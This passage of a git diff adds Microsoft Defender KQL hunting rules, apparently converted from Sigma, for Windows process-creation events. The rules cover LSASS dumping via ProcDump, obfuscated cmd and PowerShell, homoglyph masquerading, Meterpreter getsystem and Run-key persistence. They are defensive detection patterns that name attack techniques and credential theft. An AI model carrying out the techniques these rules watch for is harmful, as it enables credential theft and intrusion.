+| where ProcessCommandLine contains "^^" or ProcessCommandLine contains "^|^" or ProcessCommandLine contains ",;," or ProcessCommandLine contains ";;;;" or ProcessCommandLine contains ";; ;;" or ProcessCommandLine contains "(,(," or ProcessCommandLine contains "%COMSPEC:~" or ProcessCommandLine contains " c^m^d" or ProcessCommandLine contains "^c^m^d" or ProcessCommandLine contains " c^md" or ProcessCommandLine contains " cm^d" or ProcessCommandLine contains "^cm^d" or ProcessCommandLine contains " s^et " or ProcessCommandLine contains " s^e^t " or ProcessCommandLine contains " se^t "
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql b/KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql
new file mode 100644
index 00000000..25801352
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_download_upload_activity_using_type_command.kql
@@ -0,0 +1,10 @@
+// Title: Potential Download/Upload Activity Using Type Command
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-12-14
+// Level: medium
+// Description: Detects usage of the "type" command to download/upload data from WebDAV server
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1105
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "type \\\\" and ProcessCommandLine contains " > ") or (ProcessCommandLine contains "type " and ProcessCommandLine contains " > \\\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql b/KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql
new file mode 100644
index 00000000..abc4ecbe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_dropper_script_execution_via_wscript_cscript.kql
@@ -0,0 +1,12 @@
+// Title: Potential Dropper Script Execution Via WScript/CScript
+// Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-01-16
+// Level: medium
+// Description: Detects wscript/cscript executions of scripts located in user directories
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.005, attack.t1059.007
+// False Positives:
+//   - Some installers might generate a similar behavior. An initial baseline is required
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe") and (ProcessCommandLine contains ".js" or ProcessCommandLine contains ".jse" or ProcessCommandLine contains ".vba" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".wsf") and (ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Tmp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql b/KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql
new file mode 100644
index 00000000..f4b66630
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_encoded_powershell_patterns_in_commandline.kql
@@ -0,0 +1,10 @@
+// Title: Potential Encoded PowerShell Patterns In CommandLine
+// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
+// Date: 2020-10-11
+// Level: low
+// Description: Detects specific combinations of encoding methods in PowerShell via the commandline
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027, attack.execution, attack.t1059.001
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (((ProcessCommandLine contains "ToInt" or ProcessCommandLine contains "ToDecimal" or ProcessCommandLine contains "ToByte" or ProcessCommandLine contains "ToUint" or ProcessCommandLine contains "ToSingle" or ProcessCommandLine contains "ToSByte") and (ProcessCommandLine contains "ToChar" or ProcessCommandLine contains "ToString" or ProcessCommandLine contains "String")) or ((ProcessCommandLine contains "char" and ProcessCommandLine contains "join") or (ProcessCommandLine contains "split" and ProcessCommandLine contains "join")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql b/KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql
new file mode 100644
index 00000000..f21b7efb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_excel_exe_dcom_lateral_movement_via_activatemicrosoftapp.kql
@@ -0,0 +1,10 @@
+// Title: Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp
+// Author: Aaron Stratton
+// Date: 2023-11-13
+// Level: high
+// Description: Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.t1021.003, attack.lateral-movement
+
+DeviceProcessEvents
+| where ((ProcessVersionInfoOriginalFileName in~ ("foxprow.exe", "schdplus.exe", "winproj.exe")) or (FolderPath endswith "\\foxprow.exe" or FolderPath endswith "\\schdplus.exe" or FolderPath endswith "\\winproj.exe")) and InitiatingProcessFolderPath endswith "\\excel.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql b/KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql
new file mode 100644
index 00000000..5c2e7cfe
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_execution_of_sysinternals_tools.kql
@@ -0,0 +1,13 @@
+// Title: Potential Execution of Sysinternals Tools
+// Author: Markus Neis
+// Date: 2017-08-28
+// Level: low
+// Description: Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools
+// MITRE Tactic: Resource Development
+// Tags: attack.resource-development, attack.t1588.002
+// False Positives:
+//   - Legitimate use of SysInternals tools
+//   - Programs that use the same command line flag
+
+DeviceProcessEvents
+| where ProcessCommandLine contains " -accepteula" or ProcessCommandLine contains " /accepteula" or ProcessCommandLine contains " –accepteula" or ProcessCommandLine contains " —accepteula" or ProcessCommandLine contains " ―accepteula"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql b/KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql
new file mode 100644
index 00000000..540371d3
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_fake_instance_of_hxtsr_exe_executed.kql
@@ -0,0 +1,12 @@
+// Title: Potential Fake Instance Of Hxtsr.EXE Executed
+// Author: Sreeman
+// Date: 2020-04-17
+// Level: medium
+// Description: HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.
+// HxTsr.exe is part of Outlook apps, because it resides in a hidden "WindowsApps" subfolder of "C:\Program Files".
+// Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceProcessEvents
+| where FolderPath endswith "\\hxtsr.exe" and (not((FolderPath contains ":\\program files\\windowsapps\\microsoft.windowscommunicationsapps_" and FolderPath endswith "\\hxtsr.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql b/KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql
new file mode 100644
index 00000000..64e50595
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_file_download_via_ms_appinstaller_protocol_handler.kql
@@ -0,0 +1,11 @@
+// Title: Potential File Download Via MS-AppInstaller Protocol Handler
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel
+// Date: 2023-11-09
+// Level: medium
+// Description: Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
+// The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\<RANDOM-8-CHAR-DIRECTORY>"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "ms-appinstaller://" and ProcessCommandLine contains "source=") and ProcessCommandLine contains "http"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql b/KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql
new file mode 100644
index 00000000..c52573fc
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_file_overwrite_via_sysinternals_sdelete.kql
@@ -0,0 +1,10 @@
+// Title: Potential File Overwrite Via Sysinternals SDelete
+// Author: frack113
+// Date: 2021-06-03
+// Level: high
+// Description: Detects the use of SDelete to erase a file not the free space
+// MITRE Tactic: Impact
+// Tags: attack.impact, attack.t1485
+
+DeviceProcessEvents
+| where ProcessVersionInfoOriginalFileName =~ "sdelete.exe" and (not((ProcessCommandLine contains " -h" or ProcessCommandLine contains " -c" or ProcessCommandLine contains " -z" or ProcessCommandLine contains " /?")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql b/KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
new file mode 100644
index 00000000..52c4e4bb
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_hidden_directory_creation_via_ntfs_index_allocation_stream_cli.kql
@@ -0,0 +1,12 @@
+// Title: Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI
+// Author: Nasreddine Bencherchali (Nextron Systems), Scoubi (@ScoubiMtl)
+// Date: 2023-10-09
+// Level: medium
+// Description: Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1564.004
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "::$index_allocation"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql b/KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql
new file mode 100644
index 00000000..4f75e317
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_homoglyph_attack_using_lookalike_characters.kql
@@ -0,0 +1,14 @@
+// Title: Potential Homoglyph Attack Using Lookalike Characters
+// Author: Micah Babinski, @micahbabinski
+// Date: 2023-05-07
+// Level: medium
+// Description: Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
+// This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
+// are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.t1036.003
+// False Positives:
+//   - Commandlines with legitimate Cyrillic text; will likely require tuning (or not be usable) in countries where these alphabets are in use.
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "а" or ProcessCommandLine contains "е" or ProcessCommandLine contains "о" or ProcessCommandLine contains "р" or ProcessCommandLine contains "с" or ProcessCommandLine contains "х" or ProcessCommandLine contains "ѕ" or ProcessCommandLine contains "і" or ProcessCommandLine contains "ӏ" or ProcessCommandLine contains "ј" or ProcessCommandLine contains "һ" or ProcessCommandLine contains "ԁ" or ProcessCommandLine contains "ԛ" or ProcessCommandLine contains "ԝ" or ProcessCommandLine contains "ο") or (ProcessCommandLine contains "А" or ProcessCommandLine contains "В" or ProcessCommandLine contains "Е" or ProcessCommandLine contains "К" or ProcessCommandLine contains "М" or ProcessCommandLine contains "Н" or ProcessCommandLine contains "О" or ProcessCommandLine contains "Р" or ProcessCommandLine contains "С" or ProcessCommandLine contains "Т" or ProcessCommandLine contains "Х" or ProcessCommandLine contains "Ѕ" or ProcessCommandLine contains "І" or ProcessCommandLine contains "Ј" or ProcessCommandLine contains "Ү" or ProcessCommandLine contains "Ӏ" or ProcessCommandLine contains "Ԍ" or ProcessCommandLine contains "Ԛ" or ProcessCommandLine contains "Ԝ" or ProcessCommandLine contains "Α" or ProcessCommandLine contains "Β" or ProcessCommandLine contains "Ε" or ProcessCommandLine contains "Ζ" or ProcessCommandLine contains "Η" or ProcessCommandLine contains "Ι" or ProcessCommandLine contains "Κ" or ProcessCommandLine contains "Μ" or ProcessCommandLine contains "Ν" or ProcessCommandLine contains "Ο" or ProcessCommandLine contains "Ρ" or ProcessCommandLine contains "Τ" or ProcessCommandLine contains "Υ" or ProcessCommandLine contains "Χ")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql b/KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql
new file mode 100644
index 00000000..10d4e84c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_lateral_movement_via_windows_remote_shell.kql
@@ -0,0 +1,12 @@
+// Title: Potential Lateral Movement via Windows Remote Shell
+// Author: Liran Ravich
+// Date: 2025-10-22
+// Level: medium
+// Description: Detects a child process spawned by 'winrshost.exe', which suggests remote command execution through Windows Remote Shell (WinRs) and may indicate potential lateral movement activity.
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1021.006
+// False Positives:
+//   - Legitimate use of WinRM within the organization
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\winrshost.exe" and (not(FolderPath =~ "C:\\Windows\\System32\\conhost.exe"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql b/KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql
new file mode 100644
index 00000000..0a5e2204
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_lethalhta_technique_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential LethalHTA Technique Execution
+// Author: Markus Neis
+// Date: 2018-06-07
+// Level: high
+// Description: Detects potential LethalHTA technique where the "mshta.exe" is spawned by an "svchost.exe" process
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.005
+
+DeviceProcessEvents
+| where FolderPath endswith "\\mshta.exe" and InitiatingProcessFolderPath endswith "\\svchost.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql b/KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql
new file mode 100644
index 00000000..a5aa6c57
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_lsass_process_dump_via_procdump.kql
@@ -0,0 +1,16 @@
+// Title: Potential LSASS Process Dump Via Procdump
+// Author: Florian Roth (Nextron Systems)
+// Date: 2018-10-30
+// Level: high
+// Description: Detects potential credential harvesting attempts through LSASS memory dumps using ProcDump.
+// This rule identifies suspicious command-line patterns that combine memory dump flags (-ma, -mm, -mp) with LSASS-related process markers.
+// LSASS (Local Security Authority Subsystem Service) contains sensitive authentication data including plaintext passwords, NTLM hashes, and Kerberos tickets in memory.
+// Attackers commonly dump LSASS memory to extract credentials for lateral movement and privilege escalation.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036, attack.credential-access, attack.t1003.001, car.2013-05-009
+// False Positives:
+//   - Unlikely, because no one should dump an lsass process memory
+//   - Another tool that uses command line flags similar to ProcDump
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " /ma " or ProcessCommandLine contains " –ma " or ProcessCommandLine contains " —ma " or ProcessCommandLine contains " ―ma " or ProcessCommandLine contains " -mm " or ProcessCommandLine contains " /mm " or ProcessCommandLine contains " –mm " or ProcessCommandLine contains " —mm " or ProcessCommandLine contains " ―mm " or ProcessCommandLine contains " -mp " or ProcessCommandLine contains " /mp " or ProcessCommandLine contains " –mp " or ProcessCommandLine contains " —mp " or ProcessCommandLine contains " ―mp ") and (ProcessCommandLine contains " ls" or ProcessCommandLine contains " keyiso" or ProcessCommandLine contains " samss")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql b/KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql
new file mode 100644
index 00000000..178f8a80
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_manage_bde_wsf_abuse_to_proxy_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Manage-bde.wsf Abuse To Proxy Execution
+// Author: oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2020-10-13
+// Level: high
+// Description: Detects potential abuse of the "manage-bde.wsf" script as a LOLBIN to proxy execution
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1216
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "manage-bde.wsf" and (FolderPath endswith "\\wscript.exe" or ProcessVersionInfoOriginalFileName =~ "wscript.exe")) or ((InitiatingProcessCommandLine contains "manage-bde.wsf" and (InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(FolderPath endswith "\\cmd.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql b/KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql
new file mode 100644
index 00000000..9efe4f59
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_memory_dumping_activity_via_livekd.kql
@@ -0,0 +1,12 @@
+// Title: Potential Memory Dumping Activity Via LiveKD
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-15
+// Level: medium
+// Description: Detects execution of LiveKD based on PE metadata or image name
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+// False Positives:
+//   - Administration and debugging activity (must be investigated)
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\livekd.exe" or FolderPath endswith "\\livekd64.exe") or ProcessVersionInfoOriginalFileName =~ "livekd.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql b/KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql
new file mode 100644
index 00000000..f77d2325
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_meterpreter_cobaltstrike_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Meterpreter/CobaltStrike Activity
+// Author: Teymur Kheirkhabarov, Ecco, Florian Roth
+// Date: 2019-10-26
+// Level: high
+// Description: Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service starting
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1134.001, attack.t1134.002
+// False Positives:
+//   - Commandlines containing components like cmd accidentally
+//   - Jobs and services started with cmd
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\services.exe" and (((ProcessCommandLine contains "cmd" or ProcessCommandLine contains "%COMSPEC%") and (ProcessCommandLine contains "/c" and ProcessCommandLine contains "echo" and ProcessCommandLine contains "\\pipe\\")) or (ProcessCommandLine contains "rundll32" and ProcessCommandLine contains ".dll,a" and ProcessCommandLine contains "/p:")) and (not(ProcessCommandLine contains "MpCmdRun"))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql b/KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql
new file mode 100644
index 00000000..bc7060f8
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_mftrace_exe_abuse.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mftrace.EXE Abuse
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-09
+// Level: medium
+// Description: Detects child processes of the "Trace log generation tool for Media Foundation Tools" (Mftrace.exe) which can abused to execute arbitrary binaries.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1127
+// False Positives:
+//   - Legitimate use for tracing purposes
+
+DeviceProcessEvents
+| where InitiatingProcessFolderPath endswith "\\mftrace.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql b/KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql
new file mode 100644
index 00000000..41ff65ca
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_mpclient_dll_sideloading_via_defender_binaries.kql
@@ -0,0 +1,12 @@
+// Title: Potential Mpclient.DLL Sideloading Via Defender Binaries
+// Author: Bhabesh Raj
+// Date: 2022-08-01
+// Level: high
+// Description: Detects potential sideloading of "mpclient.dll" by Windows Defender processes ("MpCmdRun" and "NisSrv") from their non-default directory.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.defense-evasion, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\MpCmdRun.exe" or FolderPath endswith "\\NisSrv.exe") and (not((FolderPath startswith "C:\\Program Files (x86)\\Windows Defender\\" or FolderPath startswith "C:\\Program Files\\Microsoft Security Client\\" or FolderPath startswith "C:\\Program Files\\Windows Defender\\" or FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql b/KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql
new file mode 100644
index 00000000..4528084c
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_msiexec_masquerading.kql
@@ -0,0 +1,10 @@
+// Title: Potential MsiExec Masquerading
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-11-14
+// Level: high
+// Description: Detects the execution of msiexec.exe from an uncommon directory
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036.005
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\msiexec.exe" or ProcessVersionInfoOriginalFileName =~ "\\msiexec.exe") and (not((FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql b/KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql
new file mode 100644
index 00000000..5712cb83
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_mstsc_shadowing_activity.kql
@@ -0,0 +1,10 @@
+// Title: Potential MSTSC Shadowing Activity
+// Author: Florian Roth (Nextron Systems)
+// Date: 2020-01-24
+// Level: high
+// Description: Detects RDP session hijacking by using MSTSC shadowing
+// MITRE Tactic: Lateral Movement
+// Tags: attack.lateral-movement, attack.t1563.002
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "noconsentprompt" and ProcessCommandLine contains "shadow:"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql b/KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql
new file mode 100644
index 00000000..7790f853
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_network_sniffing_activity_using_network_tools.kql
@@ -0,0 +1,14 @@
+// Title: Potential Network Sniffing Activity Using Network Tools
+// Author: Timur Zinniatullin, oscd.community, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2019-10-21
+// Level: medium
+// Description: Detects potential network sniffing via use of network tools such as "tshark", "windump".
+// Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
+// An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.discovery, attack.t1040
+// False Positives:
+//   - Legitimate administration activity to troubleshoot network issues
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "-i" and FolderPath endswith "\\tshark.exe") or FolderPath endswith "\\windump.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql b/KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql
new file mode 100644
index 00000000..75328785
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_ntlm_coercion_via_certutil_exe.kql
@@ -0,0 +1,10 @@
+// Title: Potential NTLM Coercion Via Certutil.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-09-01
+// Level: high
+// Description: Detects possible NTLM coercion via certutil using the 'syncwithWU' flag
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -syncwithWU " and ProcessCommandLine contains " \\\\") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql b/KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql
new file mode 100644
index 00000000..468f6209
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_obfuscated_ordinal_call_via_rundll32.kql
@@ -0,0 +1,10 @@
+// Title: Potential Obfuscated Ordinal Call Via Rundll32
+// Author: Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2023-05-17
+// Level: medium
+// Description: Detects execution of "rundll32" with potential obfuscated ordinal calls
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.010
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "#+" or ProcessCommandLine contains "#-" or ProcessCommandLine contains "#0" or ProcessCommandLine contains "#655" or ProcessCommandLine contains "#656") and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or ProcessCommandLine contains "rundll32")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql b/KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql
new file mode 100644
index 00000000..25d2e033
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_password_spraying_attempt_using_dsacls_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Password Spraying Attempt Using Dsacls.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-06-20
+// Level: medium
+// Description: Detects possible password spraying attempts using Dsacls
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218
+// False Positives:
+//   - Legitimate use of dsacls to bind to an LDAP session
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/passwd:") and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE")
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql
new file mode 100644
index 00000000..247d9a52
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_existing_service_tampering.kql
@@ -0,0 +1,10 @@
+// Title: Potential Persistence Attempt Via Existing Service Tampering
+// Author: Sreeman
+// Date: 2020-09-29
+// Level: medium
+// Description: Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.persistence, attack.t1543.003, attack.t1574.011
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains "sc " and ProcessCommandLine contains "config " and ProcessCommandLine contains "binpath=") or (ProcessCommandLine contains "sc " and ProcessCommandLine contains "failure" and ProcessCommandLine contains "command=")) or ((ProcessCommandLine contains ".sh" or ProcessCommandLine contains ".exe" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".bin$" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".msh$" or ProcessCommandLine contains ".reg$" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".jar" or ProcessCommandLine contains ".pl") and ((ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "FailureCommand") or (ProcessCommandLine contains "reg " and ProcessCommandLine contains "add " and ProcessCommandLine contains "ImagePath")))
\ No newline at end of file
diff --git a/KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql
new file mode 100644
index 00000000..81b5797b
--- /dev/null
+++ b/KQL/rules/windows/process_creation/potential_persistence_attempt_via_run_keys_using_reg_exe.kql
@@ -0,0 +1,14 @@
+// Title: Potential Persistence Attempt Via Run Keys Using Reg.EXE
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2021-06-28
+// Level: medium
+// Description: Detects suspicious command line reg.exe tool adding key to RUN key in Registry
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.persistence, attack.t1547.001
+// False Positives:
+//   - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.
+//   - Legitimate administrator sets up autorun keys for legitimate reasons.
+//   - Discord
+
+DeviceProcessEvents
